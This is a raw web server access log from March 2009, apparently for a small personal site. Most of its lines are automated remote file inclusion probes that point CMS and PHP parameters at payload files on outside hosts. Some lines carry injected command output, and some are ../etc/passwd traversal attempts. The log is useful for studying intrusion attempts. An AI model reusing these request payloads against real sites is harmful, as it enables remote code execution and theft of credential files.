61.63.90.81 - - [12/Mar/2009:20:50:38 -0500] "GET /logs//ask_password.php?dir=http://www.lazar.ru/manager/processors/copyright.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
61.63.90.81 - - [12/Mar/2009:20:50:46 -0500] "GET /logs/access_log.1209686400//ask_password.php?dir=http://www.lazar.ru/manager/processors/copyright.txt?? HTTP/1.1" 404 328 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
201.72.166.52 - - [12/Mar/2009:20:50:51 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://3sk3nt.kit.net/safe.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
201.72.166.52 - - [12/Mar/2009:20:50:52 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://3sk3nt.kit.net/safe.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
61.63.90.81 - - [12/Mar/2009:20:50:58 -0500] "GET //ask_password.php?dir=uid=2(daemon)%20gid=2(daemon)%20groups=1(bin),2(daemon),4(adm),7(lp)%0A? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
61.63.90.81 - - [12/Mar/2009:20:51:07 -0500] "GET //ask_password.php?dir=http://www.lazar.ru/manager/processors/copyright.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
61.63.90.81 - - [12/Mar/2009:20:51:18 -0500] "GET /logs/access_log.1209686400//ask_password.php?dir=uid=2(daemon)%20gid=2(daemon)%20groups=1(bin),2(daemon),4(adm),7(lp)%0A? HTTP/1.1" 404 328 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
58.226.23.55 - - [12/Mar/2009:20:51:28 -0500] "GET //ask_password.php?dir=http://www.lazar.ru/manager/processors/copyright.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
61.63.90.81 - - [12/Mar/2009:20:51:43 -0500] "GET /logs/access_log.1209686400//ask_password.php?dir=uid=2(daemon)%20gid=2(daemon)%20groups=1(bin),2(daemon),4(adm),7(lp)%0A? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
61.63.90.81 - - [12/Mar/2009:20:51:46 -0500] "GET /logs/access_log.1209686400//ask_password.php?dir=http://www.lazar.ru/manager/processors/copyright.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
61.63.90.81 - - [12/Mar/2009:20:53:21 -0500] "GET /logs//ask_password.php?dir=uid=2(daemon)%20gid=2(daemon)%20groups=1(bin),2(daemon),4(adm),7(lp)%0A? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
61.63.90.81 - - [12/Mar/2009:20:53:21 -0500] "GET /logs//ask_password.php?dir=uid=2(daemon)%20gid=2(daemon)%20groups=1(bin),2(daemon),4(adm),7(lp)%0A? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
61.63.90.81 - - [12/Mar/2009:20:53:22 -0500] "GET //ask_password.php?dir=uid=2(daemon)%20gid=2(daemon)%20groups=1(bin),2(daemon),4(adm),7(lp)%0A? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
61.63.90.81 - - [12/Mar/2009:20:53:22 -0500] "GET //ask_password.php?dir=uid=2(daemon)%20gid=2(daemon)%20groups=1(bin),2(daemon),4(adm),7(lp)%0A? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
61.63.90.81 - - [12/Mar/2009:20:53:41 -0500] "GET /logs//ask_password.php?dir=http://www.lazar.ru/manager/processors/copyright.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
61.63.90.81 - - [12/Mar/2009:20:53:41 -0500] "GET //ask_password.php?dir=http://www.lazar.ru/manager/processors/copyright.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
61.63.90.81 - - [12/Mar/2009:20:53:46 -0500] "GET /logs//ask_password.php?dir=http://www.lazar.ru/manager/processors/copyright.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
61.63.90.81 - - [12/Mar/2009:20:53:47 -0500] "GET //ask_password.php?dir=http://www.lazar.ru/manager/processors/copyright.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
58.226.23.55 - - [12/Mar/2009:20:54:15 -0500] "GET /logs/access_log.1212019200//ask_password.php?dir=http://www.lazar.ru/manager/processors/copyright.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
58.226.23.55 - - [12/Mar/2009:20:54:16 -0500] "GET //ask_password.php?dir=http://www.lazar.ru/manager/processors/copyright.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
58.226.23.55 - - [12/Mar/2009:20:54:16 -0500] "GET /logs//ask_password.php?dir=http://www.lazar.ru/manager/processors/copyright.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
58.226.23.55 - - [12/Mar/2009:20:56:13 -0500] "GET /logs/access_log.1209686400//ask_password.php?dir=http://www.lazar.ru/manager/processors/copyright.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
66.194.251.253 - - [12/Mar/2009:20:57:51 -0500] "GET /logs//main.php?sayfa=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
66.194.251.253 - - [12/Mar/2009:20:57:51 -0500] "GET //main.php?sayfa=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
77.93.208.64 - - [12/Mar/2009:20:58:07 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.lazar.ru/manager/processors/copyright.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
148.202.29.8 - - [12/Mar/2009:20:58:28 -0500] "GET /logs/browse.php/header.php?prefix=http://star.jbsc.ac.kr/technote/config/menu/id.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
148.202.29.8 - - [12/Mar/2009:20:58:28 -0500] "GET /browse.php/header.php?prefix=http://star.jbsc.ac.kr/technote/config/menu/id.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
61.63.90.81 - - [12/Mar/2009:20:59:15 -0500] "GET /logs/access_log.1205366400//faqsupport/samplefaqsupport.php?path[docroot]=uid=2(daemon)%20gid=2(daemon)%20groups=1(bin),2(daemon),4(adm),7(lp)%0A? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
61.63.90.81 - - [12/Mar/2009:20:59:15 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=uid=2(daemon)%20gid=2(daemon)%20groups=1(bin),2(daemon),4(adm),7(lp)%0A? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
61.63.90.81 - - [12/Mar/2009:20:59:15 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=uid=2(daemon)%20gid=2(daemon)%20groups=1(bin),2(daemon),4(adm),7(lp)%0A? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
201.72.166.52 - - [12/Mar/2009:20:59:44 -0500] "GET /logs//login.php?dir=http://3sk3nt.kit.net/safe.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
201.72.166.52 - - [12/Mar/2009:20:59:44 -0500] "GET //login.php?dir=http://3sk3nt.kit.net/safe.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
89.108.64.152 - - [12/Mar/2009:21:00:09 -0500] "GET /logs/access_log.1210550400//faqsupport/samplefaqsupport.php?path[docroot]=http://www.lazar.ru/manager/processors/copyright.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.812"
89.108.64.152 - - [12/Mar/2009:21:00:09 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.lazar.ru/manager/processors/copyright.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.812"
89.108.64.152 - - [12/Mar/2009:21:00:10 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.lazar.ru/manager/processors/copyright.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.812"
75.125.245.26 - - [12/Mar/2009:21:00:58 -0500] "GET /logs/access_log.1217721600/errors.php?error=http://mrkz.t35.com/idv6.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
75.125.245.26 - - [12/Mar/2009:21:00:58 -0500] "GET /errors.php?error=http://mrkz.t35.com/idv6.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
75.125.245.26 - - [12/Mar/2009:21:00:58 -0500] "GET /logs/errors.php?error=http://mrkz.t35.com/idv6.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
148.202.29.8 - - [12/Mar/2009:21:01:22 -0500] "GET /logs/access_log.1210550400/browse.php/header.php?prefix=http://star.jbsc.ac.kr/technote/config/menu/id.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.803"
148.202.29.8 - - [12/Mar/2009:21:01:22 -0500] "GET /browse.php/header.php?prefix=http://star.jbsc.ac.kr/technote/config/menu/id.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
148.202.29.8 - - [12/Mar/2009:21:01:22 -0500] "GET /logs/browse.php/header.php?prefix=http://star.jbsc.ac.kr/technote/config/menu/id.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
67.76.163.60 - - [12/Mar/2009:21:02:35 -0500] "GET /logs/access_log.1211155200//admin/spaw/spaw_control.class.php?spaw_root=http://gumansin.com/id.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
67.76.163.60 - - [12/Mar/2009:21:02:43 -0500] "GET /logs/access_log.1211155200//admin/spaw/spaw_control.class.php?spaw_root=http://gumansin.com/id.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
67.76.163.60 - - [12/Mar/2009:21:02:58 -0500] "GET /logs/access_log.1217635200//admin/spaw/spaw_control.class.php?spaw_root=http://gumansin.com/id.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
67.76.163.60 - - [12/Mar/2009:21:03:05 -0500] "GET /logs/access_log.1217635200//admin/spaw/spaw_control.class.php?spaw_root=http://gumansin.com/id.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
72.30.142.163 - - [12/Mar/2009:21:03:05 -0500] "GET /logs/access_log.1209686400 HTTP/1.0" 200 226901 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
200.203.126.15 - - [12/Mar/2009:21:03:12 -0500] "GET /logs/access_log.1211328000//init_basic.php?GALLERY_BASEDIR=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
200.203.126.15 - - [12/Mar/2009:21:03:12 -0500] "GET //init_basic.php?GALLERY_BASEDIR=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
200.203.126.15 - - [12/Mar/2009:21:03:12 -0500] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
75.125.245.26 - - [12/Mar/2009:21:03:47 -0500] "GET /logs/access_log.1212192000/errors.php?error=http://mrkz.t35.com/idv6.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
65.55.208.133 - - [12/Mar/2009:21:05:57 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.133 - - [12/Mar/2009:21:06:01 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 2177 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
61.63.90.81 - - [12/Mar/2009:21:07:12 -0500] "GET /logs/access_log.1210550400//faqsupport/samplefaqsupport.php?path[docroot]=uid=2(daemon)%20gid=2(daemon)%20groups=1(bin),2(daemon),4(adm),7(lp)%0A? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
58.226.23.55 - - [12/Mar/2009:21:07:31 -0500] "GET /logs/access_log.1217289600%20%20/?INCLUDE_FOLDER=http://cccgj.org/components/com_wrap/htaccess.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
58.226.23.55 - - [12/Mar/2009:21:07:31 -0500] "GET /?INCLUDE_FOLDER=http://cccgj.org/components/com_wrap/htaccess.txt?? HTTP/1.1" 200 1243 "-""Mozilla/5.0"
58.226.23.55 - - [12/Mar/2009:21:07:32 -0500] "GET /logs/?INCLUDE_FOLDER=http://cccgj.org/components/com_wrap/htaccess.txt?? HTTP/1.1" 200 122039 "-""Mozilla/5.0"
82.226.108.61 - - [12/Mar/2009:21:07:36 -0500] "GET /admin/inc/include.php?language=0&lang_settings[0][1]=http://gumansin.com/id.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
82.226.108.61 - - [12/Mar/2009:21:07:36 -0500] "GET /logs/admin/inc/include.php?language=0&lang_settings[0][1]=http://gumansin.com/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
80.67.26.159 - - [12/Mar/2009:21:07:40 -0500] "GET /logs/access_log.1217289600%20%20/?INCLUDE_FOLDER=http://roadone.net//board/data/photo/db/fatal1.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
80.67.26.159 - - [12/Mar/2009:21:07:40 -0500] "GET /?INCLUDE_FOLDER=http://roadone.net//board/data/photo/db/fatal1.txt???? HTTP/1.1" 200 1243 "-""Mozilla/5.0"
80.67.26.159 - - [12/Mar/2009:21:07:41 -0500] "GET /logs/?INCLUDE_FOLDER=http://roadone.net//board/data/photo/db/fatal1.txt???? HTTP/1.1" 200 122039 "-""Mozilla/5.0"
200.203.126.15 - - [12/Mar/2009:21:07:42 -0500] "GET /logs/access_log.1219536000//init_basic.php?GALLERY_BASEDIR=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
80.67.26.159 - - [12/Mar/2009:21:10:26 -0500] "GET /logs/access_log.1217203200/?INCLUDE_FOLDER=http://roadone.net//board/data/photo/db/fatal1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
82.226.108.61 - - [12/Mar/2009:21:10:43 -0500] "GET /logs/access_log.1216684800/admin/inc/include.php?language=0&lang_settings[0][1]=http://gumansin.com/id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
80.67.26.159 - - [12/Mar/2009:21:10:45 -0500] "GET /logs/access_log.1217289600/?INCLUDE_FOLDER=http://roadone.net//board/data/photo/db/fatal1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
91.121.112.152 - - [12/Mar/2009:21:12:11 -0500] "GET /logs/access_log.1217721600/home.php?action=http://www.melhoreseremdois.com//plugins/safehtml/Help01.txt???? HTTP/1.1" 404 319 "-""libwww-perl/5.803"
91.121.112.152 - - [12/Mar/2009:21:12:11 -0500] "GET /home.php?action=http://www.melhoreseremdois.com//plugins/safehtml/Help01.txt???? HTTP/1.1" 404 292 "-""libwww-perl/5.803"
91.121.112.152 - - [12/Mar/2009:21:12:11 -0500] "GET /logs/home.php?action=http://www.melhoreseremdois.com//plugins/safehtml/Help01.txt???? HTTP/1.1" 404 297 "-""libwww-perl/5.803"
91.121.112.152 - - [12/Mar/2009:21:12:24 -0500] "GET /logs/access_log.1216684800/home.php?action=http://www.melhoreseremdois.com//plugins/safehtml/Help01.txt???? HTTP/1.1" 404 319 "-""libwww-perl/5.803"
81.12.13.152 - - [12/Mar/2009:21:16:28 -0500] "GET /logs/access_log.1217289600%20%20/?INCLUDE_FOLDER=http://cccgj.org/components/com_wrap/htaccess.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
81.12.13.152 - - [12/Mar/2009:21:16:28 -0500] "GET /?INCLUDE_FOLDER=http://cccgj.org/components/com_wrap/htaccess.txt?? HTTP/1.1" 200 1243 "-""Mozilla/5.0"
81.12.13.152 - - [12/Mar/2009:21:16:30 -0500] "GET /logs/?INCLUDE_FOLDER=http://cccgj.org/components/com_wrap/htaccess.txt?? HTTP/1.1" 200 122039 "-""Mozilla/5.0"
61.110.18.100 - - [12/Mar/2009:21:18:36 -0500] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
61.110.18.100 - - [12/Mar/2009:21:18:36 -0500] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
61.110.18.100 - - [12/Mar/2009:21:18:36 -0500] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
61.110.18.100 - - [12/Mar/2009:21:18:36 -0500] "GET /logs/access_log.1217289600/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 354 "-""libwww-perl/5.805"
61.110.18.100 - - [12/Mar/2009:21:18:36 -0500] "GET /logs/access_log.1217289600/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 354 "-""libwww-perl/5.805"
61.110.18.100 - - [12/Mar/2009:21:18:36 -0500] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
89.111.173.113 - - [12/Mar/2009:21:19:28 -0500] "GET //browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.renaultfreunde-erzgebirge.de/hk? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
83.167.62.172 - - [12/Mar/2009:21:19:51 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1694 "-""Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
91.121.112.152 - - [12/Mar/2009:21:20:55 -0500] "GET /logs/access_log.1217721600/home.php?action=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 319 "-""libwww-perl/5.803"
91.121.112.152 - - [12/Mar/2009:21:20:55 -0500] "GET /logs/home.php?action=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-""libwww-perl/5.803"
91.121.112.152 - - [12/Mar/2009:21:20:55 -0500] "GET /home.php?action=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 292 "-""libwww-perl/5.803"
91.121.112.152 - - [12/Mar/2009:21:20:58 -0500] "GET /logs/access_log.1216684800/home.php?action=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 319 "-""libwww-perl/5.803"
124.0.73.2 - - [12/Mar/2009:21:21:00 -0500] "GET ///vwar/backup/errors.php?error=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
148.202.29.8 - - [12/Mar/2009:21:22:40 -0500] "GET /logs/browse.php/header.php?prefix=http://star.jbsc.ac.kr/technote/config/menu/id.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
148.202.29.8 - - [12/Mar/2009:21:22:40 -0500] "GET /browse.php/header.php?prefix=http://star.jbsc.ac.kr/technote/config/menu/id.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
72.233.30.186 - - [12/Mar/2009:21:22:41 -0500] "GET //poll/poll_ssi.php?include_path=http://www.renaultfreunde-erzgebirge.de/hk? HTTP/1.1" 404 302 "-""libwww-perl/5.811"
148.202.29.8 - - [12/Mar/2009:21:24:58 -0500] "GET /logs/access_log.1210550400/browse.php/header.php?prefix=http://star.jbsc.ac.kr/technote/config/menu/id.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.803"
148.202.29.8 - - [12/Mar/2009:21:24:58 -0500] "GET /browse.php/header.php?prefix=http://star.jbsc.ac.kr/technote/config/menu/id.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
148.202.29.8 - - [12/Mar/2009:21:24:58 -0500] "GET /logs/browse.php/header.php?prefix=http://star.jbsc.ac.kr/technote/config/menu/id.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
81.169.143.242 - - [12/Mar/2009:21:26:27 -0500] "GET /logs/modifyform.html?code=http://www.kazandoska.ru/inc/id.txt??? HTTP/1.1" 404 304 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
81.169.143.242 - - [12/Mar/2009:21:26:28 -0500] "GET /modifyform.html?code=http://www.kazandoska.ru/inc/id.txt??? HTTP/1.1" 404 299 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
81.12.13.152 - - [12/Mar/2009:21:28:03 -0500] "GET /logs/access_log.1217203200/?INCLUDE_FOLDER=http://cccgj.org/components/com_wrap/htaccess.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
81.12.13.152 - - [12/Mar/2009:21:28:13 -0500] "GET /logs/access_log.1217289600/?INCLUDE_FOLDER=http://cccgj.org/components/com_wrap/htaccess.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
62.128.131.80 - - [12/Mar/2009:21:29:46 -0500] "GET /logs/access_log.1215302400//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.elitewheels.ru/images/stories/.cnn?? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
62.128.131.80 - - [12/Mar/2009:21:29:46 -0500] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.elitewheels.ru/images/stories/.cnn?? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
62.128.131.80 - - [12/Mar/2009:21:29:48 -0500] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.elitewheels.ru/images/stories/.cnn?? HTTP/1.1" 200 122044 "-""libwww-perl/5.803"
62.128.131.80 - - [12/Mar/2009:21:30:59 -0500] "GET /logs/access_log.1219449600//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.elitewheels.ru/images/stories/.cnn?? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
62.128.131.80 - - [12/Mar/2009:21:30:59 -0500] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.elitewheels.ru/images/stories/.cnn?? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
62.128.131.80 - - [12/Mar/2009:21:31:00 -0500] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.elitewheels.ru/images/stories/.cnn?? HTTP/1.1" 200 122044 "-""libwww-perl/5.803"
62.128.131.80 - - [12/Mar/2009:21:31:02 -0500] "GET /logs/access_log.1219449600//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.elitewheels.ru/images/stories/.cnn?? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
62.128.131.80 - - [12/Mar/2009:21:31:02 -0500] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.elitewheels.ru/images/stories/.cnn?? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
62.128.131.80 - - [12/Mar/2009:21:31:04 -0500] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.elitewheels.ru/images/stories/.cnn?? HTTP/1.1" 200 122044 "-""libwww-perl/5.803"
72.233.30.186 - - [12/Mar/2009:21:34:07 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://www.renaultfreunde-erzgebirge.de/hk? HTTP/1.1" 404 307 "-""libwww-perl/5.811"
58.226.23.55 - - [12/Mar/2009:21:34:11 -0500] "GET /include/db.php?GLOBALS[rootdp]=http://www.lazar.ru/manager/processors/copyright.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
58.226.23.55 - - [12/Mar/2009:21:34:11 -0500] "GET /logs/include/db.php?GLOBALS[rootdp]=http://www.lazar.ru/manager/processors/copyright.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
62.128.131.80 - - [12/Mar/2009:21:35:22 -0500] "GET /logs/access_log.1209513600//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.elitewheels.ru/images/stories/.cnn?? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
62.128.131.80 - - [12/Mar/2009:21:35:22 -0500] "GET /logs/access_log.1209513600//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.elitewheels.ru/images/stories/.cnn?? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
213.203.223.93 - - [12/Mar/2009:21:36:10 -0500] "GET //claroline/inc/claro_init_header.inc.php?includePath=http://okto.co.kr//zboard/include/idxx.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
213.203.223.93 - - [12/Mar/2009:21:36:10 -0500] "GET /logs//claroline/inc/claro_init_header.inc.php?includePath=http://okto.co.kr//zboard/include/idxx.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
213.203.223.93 - - [12/Mar/2009:21:36:10 -0500] "GET /logs/access_log.1206576000//claroline/inc/claro_init_header.inc.php?includePath=http://okto.co.kr//zboard/include/idxx.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
77.221.130.3 - - [12/Mar/2009:21:36:50 -0500] "GET //claroline/inc/claro_init_header.inc.php?includePath=http://okto.co.kr//zboard/include/test.txt?? HTTP/1.1" 404 324 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
77.221.130.3 - - [12/Mar/2009:21:36:50 -0500] "GET /logs//claroline/inc/claro_init_header.inc.php?includePath=http://okto.co.kr//zboard/include/test.txt?? HTTP/1.1" 404 329 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
69.43.201.9 - - [12/Mar/2009:21:39:12 -0500] "GET /logs/access_log.1219536000%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
69.43.201.9 - - [12/Mar/2009:21:39:13 -0500] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
69.43.201.9 - - [12/Mar/2009:21:39:13 -0500] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
69.43.201.9 - - [12/Mar/2009:21:39:17 -0500] "GET /logs/access_log.1217289600%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
62.128.131.80 - - [12/Mar/2009:21:39:28 -0500] "GET /logs/access_log.1218499200//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.elitewheels.ru/images/stories/.cnn?? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
62.128.131.80 - - [12/Mar/2009:21:39:28 -0500] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.elitewheels.ru/images/stories/.cnn?? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
62.128.131.80 - - [12/Mar/2009:21:39:30 -0500] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.elitewheels.ru/images/stories/.cnn?? HTTP/1.1" 200 122044 "-""libwww-perl/5.803"
62.128.131.80 - - [12/Mar/2009:21:39:33 -0500] "GET /logs/access_log.1219104000//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.elitewheels.ru/images/stories/.cnn?? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
71.249.36.130 - - [12/Mar/2009:21:41:06 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costumes""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
71.249.36.130 - - [12/Mar/2009:21:41:06 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
71.249.36.130 - - [12/Mar/2009:21:41:08 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://tomdolan.pconline.com/costume/""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
